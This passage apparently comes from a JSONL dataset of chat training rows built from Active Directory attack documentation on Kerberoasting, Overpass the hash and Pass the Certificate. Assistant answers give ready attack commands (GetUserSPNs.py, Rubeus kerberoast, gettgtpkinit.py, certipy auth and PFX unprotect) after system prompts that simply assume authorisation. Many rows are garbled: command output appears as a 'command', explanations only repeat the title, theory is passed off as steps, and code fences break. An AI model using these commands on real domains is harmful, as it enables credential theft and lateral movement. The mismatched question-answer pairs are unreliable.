credentials.\n\n_At the time of writing, Sept. 28th 2022,_ _the pull request (#1413)_ _adding the -no-preauth option for GetUserSPNs.py is pending._\n\n``bash\nGetUserSPNs.py -no-preauth \"bobby\" -usersfile \"services.txt\" -dc-host \"DC_IP_or_HOST\" \"DOMAIN.LOCAL\"/\n`\n\n`\nsrv01\ncifs/srv02.domain.local\ncifs/srv02\n`\n\n=== Windows\n\nRubeus (C#) can be used for that purpose.\n\n_At the time of writing, Sept. 28th 2022,_ _the pull request (#139)_ _adding the /nopreauth option for Rubeus' kerberoast command is pending._\n\n`powershell\nRubeus.exe kerberoast /outfile:kerberoastables.txt /domain:\"DOMAIN.LOCAL\" /dc:\"DC01.DOMAIN.LOCAL\" /nopreauth:\"nopreauth_user\" /spn:\"target_service\"\n``\n\n:::", "metadata": {"corpus_index": 640, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/kerberoast.md", "page_title": "Kerberoast", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use GetUserSPNs.py for kerberoast - kerberoast w/o pre-authentication?"}, {"role": "assistant", "content": "GetUserSPNs.py -no-preauth \"bobby\" -usersfile \"services.txt\" -dc-host \"DC_IP_or_HOST\" \"DOMAIN.LOCAL\"/"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use GetUserSPNs.py for kerberoast - kerberoast w/o pre-authentication?", "response": "GetUserSPNs.py -no-preauth \"bobby\" -usersfile \"services.txt\" -dc-host \"DC_IP_or_HOST\" \"DOMAIN.LOCAL\"/", "metadata": {"corpus_index": 641, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/kerberoast.md", "page_title": "Kerberoast", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "GetUserSPNs.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Kerberoast - Kerberoast w/o pre-authentication?"}, {"role": "assistant", "content": "GetUserSPNs.py -no-preauth \"bobby\" -usersfile \"services.txt\" -dc-host \"DC_IP_or_HOST\" \"DOMAIN.LOCAL\"/"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Kerberoast - Kerberoast w/o pre-authentication?", "response": "GetUserSPNs.py -no-preauth \"bobby\" -usersfile \"services.txt\" -dc-host \"DC_IP_or_HOST\" \"DOMAIN.LOCAL\"/", "metadata": {"corpus_index": 641, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/kerberoast.md", "page_title": "Kerberoast", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `GetUserSPNs.py -no-preauth \"bobby\" -usersfile \"services.txt\" -dc-host \"DC_IP_or_HOST\" \"DOMAIN.LOCAL\"/`?"}, {"role": "assistant", "content": "This command is used for kerberoast - kerberoast w/o pre-authentication. Kerberoast w/o pre-authentication"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `GetUserSPNs.py -no-preauth \"bobby\" -usersfile \"services.txt\" -dc-host \"DC_IP_or_HOST\" \"DOMAIN.LOCAL\"/`?", "response": "This command is used for kerberoast - kerberoast w/o pre-authentication. Kerberoast w/o pre-authentication", "metadata": {"corpus_index": 641, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/kerberoast.md", "page_title": "Kerberoast", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the srv01 command for kerberoast - kerberoast w/o pre-authentication"}, {"role": "assistant", "content": "srv01\ncifs/srv02.domain.local\ncifs/srv02"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the srv01 command for kerberoast - kerberoast w/o pre-authentication", "response": "srv01\ncifs/srv02.domain.local\ncifs/srv02", "metadata": {"corpus_index": 642, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/kerberoast.md", "page_title": "Kerberoast", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "srv01"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Kerberoast - Kerberoast w/o pre-authentication?"}, {"role": "assistant", "content": "srv01\ncifs/srv02.domain.local\ncifs/srv02"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Kerberoast - Kerberoast w/o pre-authentication?", "response": "srv01\ncifs/srv02.domain.local\ncifs/srv02", "metadata": {"corpus_index": 642, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/kerberoast.md", "page_title": "Kerberoast", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `srv01`?"}, {"role": "assistant", "content": "This command is used for kerberoast - kerberoast w/o pre-authentication. Kerberoast w/o pre-authentication"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `srv01`?", "response": "This command is used for kerberoast - kerberoast w/o pre-authentication. Kerberoast w/o pre-authentication", "metadata": {"corpus_index": 642, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/kerberoast.md", "page_title": "Kerberoast", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the Rubeus.exe syntax for kerberoast - kerberoast w/o pre-authentication?"}, {"role": "assistant", "content": "Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:\"DOMAIN.LOCAL\" /dc:\"DC01.DOMAIN.LOCAL\" /nopreauth:\"nopreauth_user\" /spn:\"target_service\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the Rubeus.exe syntax for kerberoast - kerberoast w/o pre-authentication?", "response": "Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:\"DOMAIN.LOCAL\" /dc:\"DC01.DOMAIN.LOCAL\" /nopreauth:\"nopreauth_user\" /spn:\"target_service\"", "metadata": {"corpus_index": 643, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/kerberoast.md", "page_title": "Kerberoast", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Rubeus.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Kerberoast - Kerberoast w/o pre-authentication?"}, {"role": "assistant", "content": "Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:\"DOMAIN.LOCAL\" /dc:\"DC01.DOMAIN.LOCAL\" /nopreauth:\"nopreauth_user\" /spn:\"target_service\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Kerberoast - Kerberoast w/o pre-authentication?", "response": "Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:\"DOMAIN.LOCAL\" /dc:\"DC01.DOMAIN.LOCAL\" /nopreauth:\"nopreauth_user\" /spn:\"target_service\"", "metadata": {"corpus_index": 643, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/kerberoast.md", "page_title": "Kerberoast", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:\"DOMAIN.LOCAL\" /dc:\"DC01.DOMAIN.LOCAL\" /nopreauth:\"nopreauth_user\" /spn:\"target_service\"`?"}, {"role": "assistant", "content": "This command is used for kerberoast - kerberoast w/o pre-authentication. Kerberoast w/o pre-authentication"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:\"DOMAIN.LOCAL\" /dc:\"DC01.DOMAIN.LOCAL\" /nopreauth:\"nopreauth_user\" /spn:\"target_service\"`?", "response": "This command is used for kerberoast - kerberoast w/o pre-authentication. Kerberoast w/o pre-authentication", "metadata": {"corpus_index": 643, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/kerberoast.md", "page_title": "Kerberoast", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Kerberoast - Targeted Kerberoasting?"}, {"role": "assistant", "content": "If an attacker controls an account with the rights to add an SPN to another (GenericAll, GenericWrite), it can be abused to make that other account vulnerable to Kerberoast (see exploitation).\n\n> [!TIP]\n> Controlling a member of the Account Operators group, targeted Kerberoasting can be conducted for the whole domain (see exploitation)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Kerberoast - Targeted Kerberoasting?", "response": "If an attacker controls an account with the rights to add an SPN to another (GenericAll, GenericWrite), it can be abused to make that other account vulnerable to Kerberoast (see exploitation).\n\n> [!TIP]\n> Controlling a member of the Account Operators group, targeted Kerberoasting can be conducted for the whole domain (see exploitation).", "metadata": {"corpus_index": 644, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/kerberoast.md", "page_title": "Kerberoast", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Kerberoast - Targeted Kerberoasting"}, {"role": "assistant", "content": "If an attacker controls an account with the rights to add an SPN to another (GenericAll, GenericWrite), it can be abused to make that other account vulnerable to Kerberoast (see exploitation).\n\n> [!TIP]\n> Controlling a member of the Account Operators group, targeted Kerberoasting can be conducted for the whole domain (see exploitation)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Kerberoast - Targeted Kerberoasting", "response": "If an attacker controls an account with the rights to add an SPN to another (GenericAll, GenericWrite), it can be abused to make that other account vulnerable to Kerberoast (see exploitation).\n\n> [!TIP]\n> Controlling a member of the Account Operators group, targeted Kerberoasting can be conducted for the whole domain (see exploitation).", "metadata": {"corpus_index": 644, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/kerberoast.md", "page_title": "Kerberoast", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Overpass the hash?"}, {"role": "assistant", "content": "This technique is a form of pass the key. \n\nKerberos offers 4 different key types: DES, RC4, AES-128 and AES-256. \n\nWhen attackers know the RC4 key (which is in fact the user's NT hash), and when the RC4 etype is not disabled, they can use it to obtain Kerberos tickets.\n\n> [!TIP]\n> Read the Pass the key article for more insight"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Overpass the hash?", "response": "This technique is a form of pass the key. \n\nKerberos offers 4 different key types: DES, RC4, AES-128 and AES-256. \n\nWhen attackers know the RC4 key (which is in fact the user's NT hash), and when the RC4 etype is not disabled, they can use it to obtain Kerberos tickets.\n\n> [!TIP]\n> Read the Pass the key article for more insight", "metadata": {"corpus_index": 645, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/opth.md", "page_title": "Overpass the hash", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Overpass the hash?"}, {"role": "assistant", "content": "This technique is a form of pass the key. \n\nKerberos offers 4 different key types: DES, RC4, AES-128 and AES-256. \n\nWhen attackers know the RC4 key (which is in fact the user's NT hash), and when the RC4 etype is not disabled, they can use it to obtain Kerberos tickets.\n\n> [!TIP]\n> Read the Pass the key article for more insight"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Overpass the hash?", "response": "This technique is a form of pass the key. \n\nKerberos offers 4 different key types: DES, RC4, AES-128 and AES-256. \n\nWhen attackers know the RC4 key (which is in fact the user's NT hash), and when the RC4 etype is not disabled, they can use it to obtain Kerberos tickets.\n\n> [!TIP]\n> Read the Pass the key article for more insight", "metadata": {"corpus_index": 645, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/opth.md", "page_title": "Overpass the hash", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Pass the Certificate - Theory work?"}, {"role": "assistant", "content": "The Kerberos authentication protocol works with tickets in order to grant access. An ST (Service Ticket) can be obtained by presenting a TGT (Ticket Granting Ticket). That prior TGT can only be obtained by validating a first step named \"pre-authentication\" (except if that requirement is explicitly removed for some accounts, making them vulnerable to ASREProast). The pre-authentication can be validated symmetrically (with a DES, RC4, AES128 or AES256 key) or asymmetrically (with certificates). The asymmetrical way of pre-authenticating is called PKINIT.\n\nPass the Certificate is the fancy name given to the pre-authentication operation relying on a certificate (i.e. key pair) to pass in order to obtain a TGT. This operation is often conducted along shadow credentials, AD CS escalation and UnPAC-the-hash attacks.\n\n> [!TIP]\n> Keep in mind a certificate in itself cannot be used for authentication without the knowledge of the private key. A certificate is signed for a specific public key, that was generated along with a private key, which should be used when relying on a certificate for authentication.\n> \n> The \"certificate + private key\" pair is usually used in the following manner\n> \n> * PEM certificate + PEM private key\n> * PFX certificate export (which contains the private key) + PFX password (which protects the PFX certificate export)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Pass the Certificate - Theory work?", "response": "The Kerberos authentication protocol works with tickets in order to grant access. An ST (Service Ticket) can be obtained by presenting a TGT (Ticket Granting Ticket). That prior TGT can only be obtained by validating a first step named \"pre-authentication\" (except if that requirement is explicitly removed for some accounts, making them vulnerable to ASREProast). The pre-authentication can be validated symmetrically (with a DES, RC4, AES128 or AES256 key) or asymmetrically (with certificates). The asymmetrical way of pre-authenticating is called PKINIT.\n\nPass the Certificate is the fancy name given to the pre-authentication operation relying on a certificate (i.e. key pair) to pass in order to obtain a TGT. This operation is often conducted along shadow credentials, AD CS escalation and UnPAC-the-hash attacks.\n\n> [!TIP]\n> Keep in mind a certificate in itself cannot be used for authentication without the knowledge of the private key. A certificate is signed for a specific public key, that was generated along with a private key, which should be used when relying on a certificate for authentication.\n> \n> The \"certificate + private key\" pair is usually used in the following manner\n> \n> * PEM certificate + PEM private key\n> * PFX certificate export (which contains the private key) + PFX password (which protects the PFX certificate export)", "metadata": {"corpus_index": 646, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pass-the-certificate.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Pass the Certificate - Theory?"}, {"role": "assistant", "content": "The Kerberos authentication protocol works with tickets in order to grant access. An ST (Service Ticket) can be obtained by presenting a TGT (Ticket Granting Ticket). That prior TGT can only be obtained by validating a first step named \"pre-authentication\" (except if that requirement is explicitly removed for some accounts, making them vulnerable to ASREProast). The pre-authentication can be validated symmetrically (with a DES, RC4, AES128 or AES256 key) or asymmetrically (with certificates). The asymmetrical way of pre-authenticating is called PKINIT.\n\nPass the Certificate is the fancy name given to the pre-authentication operation relying on a certificate (i.e. key pair) to pass in order to obtain a TGT. This operation is often conducted along shadow credentials, AD CS escalation and UnPAC-the-hash attacks.\n\n> [!TIP]\n> Keep in mind a certificate in itself cannot be used for authentication without the knowledge of the private key. A certificate is signed for a specific public key, that was generated along with a private key, which should be used when relying on a certificate for authentication.\n> \n> The \"certificate + private key\" pair is usually used in the following manner\n> \n> * PEM certificate + PEM private key\n> * PFX certificate export (which contains the private key) + PFX password (which protects the PFX certificate export)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Pass the Certificate - Theory?", "response": "The Kerberos authentication protocol works with tickets in order to grant access. An ST (Service Ticket) can be obtained by presenting a TGT (Ticket Granting Ticket). That prior TGT can only be obtained by validating a first step named \"pre-authentication\" (except if that requirement is explicitly removed for some accounts, making them vulnerable to ASREProast). The pre-authentication can be validated symmetrically (with a DES, RC4, AES128 or AES256 key) or asymmetrically (with certificates). The asymmetrical way of pre-authenticating is called PKINIT.\n\nPass the Certificate is the fancy name given to the pre-authentication operation relying on a certificate (i.e. key pair) to pass in order to obtain a TGT. This operation is often conducted along shadow credentials, AD CS escalation and UnPAC-the-hash attacks.\n\n> [!TIP]\n> Keep in mind a certificate in itself cannot be used for authentication without the knowledge of the private key. A certificate is signed for a specific public key, that was generated along with a private key, which should be used when relying on a certificate for authentication.\n> \n> The \"certificate + private key\" pair is usually used in the following manner\n> \n> * PEM certificate + PEM private key\n> * PFX certificate export (which contains the private key) + PFX password (which protects the PFX certificate export)", "metadata": {"corpus_index": 646, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pass-the-certificate.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Pass the Certificate - Practice"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Dirk-jan's gettgtpkinit.py from PKINITtools tool to request a TGT (Ticket Granting Ticket) for the target object. That tool supports the use of the certificate in multiple forms.\n\n```python"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Pass the Certificate - Practice", "response": "::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Dirk-jan's gettgtpkinit.py from PKINITtools tool to request a TGT (Ticket Granting Ticket) for the target object. That tool supports the use of the certificate in multiple forms.\n\n```python", "metadata": {"corpus_index": 647, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pass-the-certificate.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Pass the Certificate - Practice"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Dirk-jan's gettgtpkinit.py from PKINITtools tool to request a TGT (Ticket Granting Ticket) for the target object. That tool supports the use of the certificate in multiple forms.\n\n```python"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Pass the Certificate - Practice", "response": "::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Dirk-jan's gettgtpkinit.py from PKINITtools tool to request a TGT (Ticket Granting Ticket) for the target object. That tool supports the use of the certificate in multiple forms.\n\n```python", "metadata": {"corpus_index": 647, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pass-the-certificate.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about PFX certificate (file) + password (string, optionnal)?"}, {"role": "assistant", "content": "gettgtpkinit.py -cert-pfx \"PATH_TO_PFX_CERT\" -pfx-pass \"CERT_PASSWORD\" \"FQDN_DOMAIN/TARGET_SAMNAME\" \"TGT_CCACHE_FILE\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about PFX certificate (file) + password (string, optionnal)?", "response": "gettgtpkinit.py -cert-pfx \"PATH_TO_PFX_CERT\" -pfx-pass \"CERT_PASSWORD\" \"FQDN_DOMAIN/TARGET_SAMNAME\" \"TGT_CCACHE_FILE\"", "metadata": {"corpus_index": 648, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pass-the-certificate.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through PFX certificate (file) + password (string, optionnal)"}, {"role": "assistant", "content": "gettgtpkinit.py -cert-pfx \"PATH_TO_PFX_CERT\" -pfx-pass \"CERT_PASSWORD\" \"FQDN_DOMAIN/TARGET_SAMNAME\" \"TGT_CCACHE_FILE\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through PFX certificate (file) + password (string, optionnal)", "response": "gettgtpkinit.py -cert-pfx \"PATH_TO_PFX_CERT\" -pfx-pass \"CERT_PASSWORD\" \"FQDN_DOMAIN/TARGET_SAMNAME\" \"TGT_CCACHE_FILE\"", "metadata": {"corpus_index": 648, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pass-the-certificate.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Base64-encoded PFX certificate (string) (password can be set) in the context of penetration testing"}, {"role": "assistant", "content": "gettgtpkinit.py -pfx-base64 $(cat \"PATH_TO_B64_PFX_CERT\") \"FQDN_DOMAIN/TARGET_SAMNAME\" \"TGT_CCACHE_FILE\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Base64-encoded PFX certificate (string) (password can be set) in the context of penetration testing", "response": "gettgtpkinit.py -pfx-base64 $(cat \"PATH_TO_B64_PFX_CERT\") \"FQDN_DOMAIN/TARGET_SAMNAME\" \"TGT_CCACHE_FILE\"", "metadata": {"corpus_index": 649, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pass-the-certificate.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Base64-encoded PFX certificate (string) (password can be set)"}, {"role": "assistant", "content": "gettgtpkinit.py -pfx-base64 $(cat \"PATH_TO_B64_PFX_CERT\") \"FQDN_DOMAIN/TARGET_SAMNAME\" \"TGT_CCACHE_FILE\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Base64-encoded PFX certificate (string) (password can be set)", "response": "gettgtpkinit.py -pfx-base64 $(cat \"PATH_TO_B64_PFX_CERT\") \"FQDN_DOMAIN/TARGET_SAMNAME\" \"TGT_CCACHE_FILE\"", "metadata": {"corpus_index": 649, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pass-the-certificate.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about PEM certificate (file) + PEM private key (file)"}, {"role": "assistant", "content": "gettgtpkinit.py -cert-pem \"PATH_TO_PEM_CERT\" -key-pem \"PATH_TO_PEM_KEY\" \"FQDN_DOMAIN/TARGET_SAMNAME\" \"TGT_CCACHE_FILE\"\n``\n\nAlternatively, Certipy (Python) can be used for the same purpose.\n\n`bash\ncertipy auth -pfx \"PATH_TO_PFX_CERT\" -password \"CERT_PASSWORD\" -dc-ip 'dc-ip' -username 'user' -domain 'domain'\n`\n\n> [!TIP]\n> Older Certipy's version don't support PFXs with password. The following command can be used to \"unprotect\" a PFX file.\n>\n> `bash\n> certipy cert -export -pfx \"PATH_TO_PFX_CERT\" -password \"CERT_PASSWORD\" -out \"unprotected.pfx\"\n> `\n\nThe ticket obtained can then be used to\n\n* authenticate with pass-the-cache\n* conduct an UnPAC-the-hash attack. This can be done with getnthash.py from PKINITtools.\n* obtain access to the account's SPN with an S4U2Self. This can be done with gets4uticket.py from PKINITtools.\n\n> [!TIP]\n> When using Certipy for Pass-the-Certificate, it automatically does UnPAC-the-hash to recover the account's NT hash, in addition to saving the TGT obtained.\n\nAnother alternative is with PassTheCert (Python) which can be used to conduct multiple techniques like elevate a user for dcsync.md or change password for a specific user.\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about PEM certificate (file) + PEM private key (file)", "response": "gettgtpkinit.py -cert-pem \"PATH_TO_PEM_CERT\" -key-pem \"PATH_TO_PEM_KEY\" \"FQDN_DOMAIN/TARGET_SAMNAME\" \"TGT_CCACHE_FILE\"\n``\n\nAlternatively, Certipy (Python) can be used for the same purpose.\n\n`bash\ncertipy auth -pfx \"PATH_TO_PFX_CERT\" -password \"CERT_PASSWORD\" -dc-ip 'dc-ip' -username 'user' -domain 'domain'\n`\n\n> [!TIP]\n> Older Certipy's version don't support PFXs with password. The following command can be used to \"unprotect\" a PFX file.\n>\n> `bash\n> certipy cert -export -pfx \"PATH_TO_PFX_CERT\" -password \"CERT_PASSWORD\" -out \"unprotected.pfx\"\n> `\n\nThe ticket obtained can then be used to\n\n* authenticate with pass-the-cache\n* conduct an UnPAC-the-hash attack. This can be done with getnthash.py from PKINITtools.\n* obtain access to the account's SPN with an S4U2Self. This can be done with gets4uticket.py from PKINITtools.\n\n> [!TIP]\n> When using Certipy for Pass-the-Certificate, it automatically does UnPAC-the-hash to recover the account's NT hash, in addition to saving the TGT obtained.\n\nAnother alternative is with PassTheCert (Python) which can be used to conduct multiple techniques like elevate a user for dcsync.md or change password for a specific user.\n\n``bash", "metadata": {"corpus_index": 650, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pass-the-certificate.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and 